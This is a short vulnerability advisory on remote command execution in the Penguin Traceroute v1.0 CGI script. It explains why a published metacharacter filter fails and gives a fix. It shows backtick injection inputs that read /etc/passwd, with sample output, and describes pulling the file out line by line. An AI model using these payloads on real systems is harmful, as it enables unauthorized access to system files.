COMMAND

	Penguin Traceroute remote command execution

SYSTEMS AFFECTED

	v1.0

PROBLEM

	Marco van Berkum [m.v.berkum@obit.nl] posted following, regarding a  web
	interface for traceroute, Penguin Traceroute:
	

	As I was surfing through some older Securityfocus  archives  I  stumbled
	across the article about Penguin traceroute v1.0
	

	

	http://online.securityfocus.com/archive/1/263285

	

	

	This article described some metacharacter bugs in this CGI script,  also
	it included a suggested fix.
	

	

	<quote>

	Fix

	   ===

	   Open up the perl script in your favorite text editor, find a line that has

	   \"$host = $q->param(\'host\');\" Its usually the 13th line down then just add

	   this line \"$host =~ s/[;<>\\*\\|\'&\\$!?#\\(\\)\\[\\]\\{\\}:\'\"\\\\]//g;\" under it and

	   that should parse out any unwanted characters.

	</quote>

	

	

	Well, yes, it does parse out some  metacharacters,  but,  the  \"  `  \"
	(backtick) is not filtered out in any way.  (probably  one  of  the  two
	quotes \" \' \" should be a backtick). Also the  slash  and  the  hyphen
	are not filtered.
	

	 Example

	 =======

	

	entering `cat /etc/passwd` gives us:
	

	

	Taceroute to `cat /etc/passwd`

	traceroute: unknown host root:*:0:0:Charlie

	

	

	This is only the first line because only that one  gets  interpreted  by
	traceroute. But there are ways around this to  retreive  the  full  file
	with some patience:
	

	

	Taceroute to `wc -l /etc/passwd`

	traceroute to 18 (0.0.0.18), 64 hops max, 40 byte packets

	

	

	So we see that in this case the passwd file is 18 lines  big.  we  could
	retreive the rest by doing tail -n 18 /etc/passwd ,  tail  -n  17  etc..
	etc..

SOLUTION

	replace the second quote by a backtick and add slash and hyphen  to  the
	filter.